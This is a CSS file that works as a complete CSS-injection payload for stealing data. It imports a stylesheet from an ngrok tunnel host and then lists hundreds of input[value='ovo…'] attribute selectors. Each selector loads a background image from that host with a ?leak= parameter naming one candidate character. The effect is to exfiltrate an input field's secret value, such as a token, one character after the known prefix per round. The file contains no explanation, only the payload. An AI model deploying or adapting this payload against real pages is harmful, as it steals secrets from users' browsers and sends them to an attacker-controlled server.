@import url("http://bc0a37bcf1d5.ngrok.io/?l=5");
input[value="ovo!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.8129357185074941");}
input[value="ovo\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.8527590041774853");}
input[value="ovo#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.471342287612895");}
input[value="ovo$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.09977519107075894");}
input[value="ovo%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.568703912592998");}
input[value="ovo&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.5970743753053802");}
input[value="ovo'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.3945023112179957");}
input[value="ovo("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.29942959627014565");}
input[value="ovo)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.9197443725734336");}
input[value="ovo*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.700708144484772");}
input[value="ovo+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7005651399171351");}
input[value="ovo,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.20842101204599262");}
input[value="ovo-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.04274840251839773");}
input[value="ovo."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.9754689800130965");}
input[value="ovo/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.7573570258402296");}
input[value="ovo0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.7251460633426376");}
input[value="ovo1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.5562940356447172");}
input[value="ovo2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.16518900487795407");}
input[value="ovo3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.2017219725870083");}
input[value="ovo4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.14702655322105618");}
input[value="ovo5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.9533916728965306");}
input[value="ovo6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.3302013301353015");}
input[value="ovo7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.1104913067478217");}
input[value="ovo8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.660964232240369");}
input[value="ovo9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.2619838294213208");}
input[value="ovo:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.7137897456775053");}
input[value="ovo;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.32432652958490893");}
input[value="ovo<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.5846577790051961");}
input[value="ovo="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.5682975457864616");}
input[value="ovo>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.4931321769977901");}
input[value="ovo?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.2400439610829117");}
input[value="ovo@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.46328208263816895");}
input[value="ovoA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.6257905548990614");}
input[value="ovoB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.23014040848974204");}
input[value="ovoC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.27117567186105584");}
input[value="ovoD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.48067409558107754");}
input[value="ovoE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.018491539234612553");}
input[value="ovoF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.25016954803434843");}
input[value="ovoG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.720688404452569");}
input[value="ovoH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.4231223539219706");}
input[value="ovoI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.7647870853227856");}
input[value="ovoJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.03716615566574455");}
input[value="ovoK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.39192388983495663");}
input[value="ovoL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.792637295087522");}
input[value="ovoM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.706659116067758");}
input[value="ovoN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.8423357084751544");}
input[value="ovoO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.05323279604775033");}
input[value="ovoP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.11779820688524523");}
input[value="ovoQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.8498734211498828");}
input[value="ovoR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.8914016062853798");}
input[value="ovoS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.09059508428997476");}
input[value="ovoT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.2454919159336113");}
input[value="ovoU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.6978014655977198");}
input[value="ovoV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.13694142369525353");}
input[value="ovoW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.9804590298585656");}
input[value="ovoX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.1934149673661878");}
input[value="ovoY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.7752387009974249");}
input[value="ovoZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.9739661978388356");}
input[value="ovo["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.033077014099824");}
input[value="ovo\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.660914492853486");}
input[value="ovo]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.8762222837502127");}
input[value="ovo^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.059908737918502375");}
input[value="ovo_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.7305050314489543");}
input[value="ovo`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.39621230967286136");}
input[value="ovoa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.07693048137883962");}
input[value="ovob"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.843108212752429");}
input[value="ovoc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.4409480492303246");}
input[value="ovod"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.7907195040651469");}
input[value="ovoe"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.37295846985572");}
input[value="ovof"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.13857158280694226");}
input[value="ovog"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.09712878809277137");}
input[value="ovoh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.931748984232013");}
input[value="ovoi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.9340597510561037");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.7125715811930102");}
input[value="ovok"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.4583483596938329");}
input[value="ovol"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.025446218733855774");}
input[value="ovom"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.7887769901953934");}
input[value="ovon"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.0486681863622922");}
input[value="ovoo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.8326688274878202");}
input[value="ovop"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.5731563764366221");}
input[value="ovoq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.7091184791615244");}
input[value="ovor"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.8193905114654387");}
input[value="ovos"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.14399231137445123");}
input[value="ovot"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.11672454038073288");}
input[value="ovou"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.08091344399325506");}
input[value="ovov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.9622523774893712");}
input[value="ovow"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.8827334643654767");}
input[value="ovox"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.5323819726206003");}
input[value="ovoy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.3101044060741158");}
input[value="ovoz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.667586905629997");}
input[value="ovo{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.7675597802196081");}
input[value="ovo|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.19137321220752912");}
input[value="ovo}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.581626722956192");}
input[value="ovo~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.06731086115985341");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5804585115134517");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8459701185480955");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.013741464860419716");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.44494935304714867");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.07957058461799504");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.07150740109432463");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9110200456025848");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.27837270289924687");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6717501651567255");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9798891324460415");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.42771409548017414");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5505165113736588");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10724736343508368");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18650032518663084");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.33793786305983264");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7980458326978992");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6280724014921237");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.504130729089753");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6112136409942559");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4297529299473255");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.936363076358169");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3167480293219427");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4749790600310495");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6679075360062956");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2035946870845462");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4813987083894835");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6570026423545778");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6345500291595427");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9847230891048142");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7909887506214133");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7192493553486459");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.37982470196746565");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4988333470997104");}
input[value="ovo "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.7414545282388398");}
input[value="ovo¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.7648529353024289");}
input[value="ovo¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.5554415440644758");}
input[value="ovo£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.5705032604245284");}
input[value="ovo¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.9028151142374032");}
input[value="ovo¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.3584636334201563");}
input[value="ovo¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.29178770527886955");}
input[value="ovo§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.47632257252904187");}
input[value="ovo¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.08594156702954314");}
input[value="ovo©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.02922610478656451");}
input[value="ovoª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.09408422270644423");}
input[value="ovo«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.7639523201923939");}
input[value="ovo¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.014723022236633687");}
input[value="ovo­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.05291237974789231");}
input[value="ovo®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.34747401732107774");}
input[value="ovo¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.5561586313276337");}
input[value="ovo°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.5539974707935209");}
input[value="ovo±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.48573237566549166");}
input[value="ovo²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.2481145492191572");}
input[value="ovo³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.055283329989843644");}
input[value="ovo´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.5926398300478342");}
input[value="ovoµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.2534907125157331");}
input[value="ovo¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.8584193932137203");}
input[value="ovo·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.8914237339736752");}
input[value="ovo¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.00863683564783213");}
input[value="ovo¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.35961756613536044");}
input[value="ovoº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.49007536605847135");}
input[value="ovo»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.21030782862593922");}
input[value="ovo¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.7033964430900141");}
input[value="ovo½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.12597270469607436");}
input[value="ovo¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.8246127205395275");}
input[value="ovo¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.6360841914502253");}
input[value="ovoÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.3068273660235239");}
input[value="ovoÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.705822207437975");}
input[value="ovoÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.6726829126958078");}
input[value="ovoÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.9683612552160001");}
input[value="ovoÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.13299764079565546");}
input[value="ovoÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.7372898079337644");}
input[value="ovoÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.8536594205968766");}
input[value="ovoÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.5764238191593121");}
input[value="ovoÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.6002366396276055");}
input[value="ovoÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.5817168300092839");}
input[value="ovoÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.3277555265927692");}
input[value="ovoË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.9128289752412444");}
input[value="ovoÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.5760018848198831");}
input[value="ovoÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.4191927641742921");}
input[value="ovoÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.1784492302346692");}
input[value="ovoÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.3310729503791823");}
input[value="ovoÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.08830677992238001");}
input[value="ovoÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.19073609184106521");}
input[value="ovoÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.9634013006701208");}
input[value="ovoÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.10561422379814367");}
input[value="ovoÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.6366847153916804");}
input[value="ovoÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.8836748150911646");}
input[value="ovoÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.09915317680620839");}
input[value="ovo×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.9813818900133697");}
input[value="ovoØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.8127955279069401");}
input[value="ovoÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.7967730657977734");}
input[value="ovoÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.0631716040857706");}
input[value="ovoÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.5216873584453205");}
input[value="ovoÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.5498116133001529");}
input[value="ovoÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.92486169598778");}
input[value="ovoÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.9984205524278484");}
input[value="ovoß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.4327805798679334");}
input[value="ovoà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.5102501005770272");}
input[value="ovoá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.21148847125328984");}
input[value="ovoâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.9420420249176114");}
input[value="ovoã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.1566473665745376");}
input[value="ovoä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.8177868849346297");}
input[value="ovoå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.9704624220592521");}
input[value="ovoæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.6283943195150272");}
input[value="ovoç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.168070494641555");}
input[value="ovoè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.3085824408603628");}
input[value="ovoé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.3022168662416629");}
input[value="ovoê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.9513859368197795");}
input[value="ovoë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.8321209174499988");}
input[value="ovoì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.16007521400503855");}
input[value="ovoí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.1363974433420252");}
input[value="ovoî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.08314537563105118");}
input[value="ovoï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.1424997665422041");}
input[value="ovoð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.3690794320634252");}
input[value="ovoñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.2641528872351344");}
input[value="ovoò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.2132578099575697");}
input[value="ovoó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.5582670391789171");}
input[value="ovoô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.6737791692363584");}
input[value="ovoõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.8577674315693411");}
input[value="ovoö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.08245134505120699");}
input[value="ovo÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.7511716485589237");}
input[value="ovoø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.36516759500497487");}
input[value="ovoù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.36013278121397674");}
input[value="ovoú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.1567727217183572");}
input[value="ovoû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.4377027926280235");}
input[value="ovoü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.17605831033512565");}
input[value="ovoý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.5332536187800934");}
input[value="ovoþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.3217414576757138");}
input[value="ovoÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.27980476433314383");}
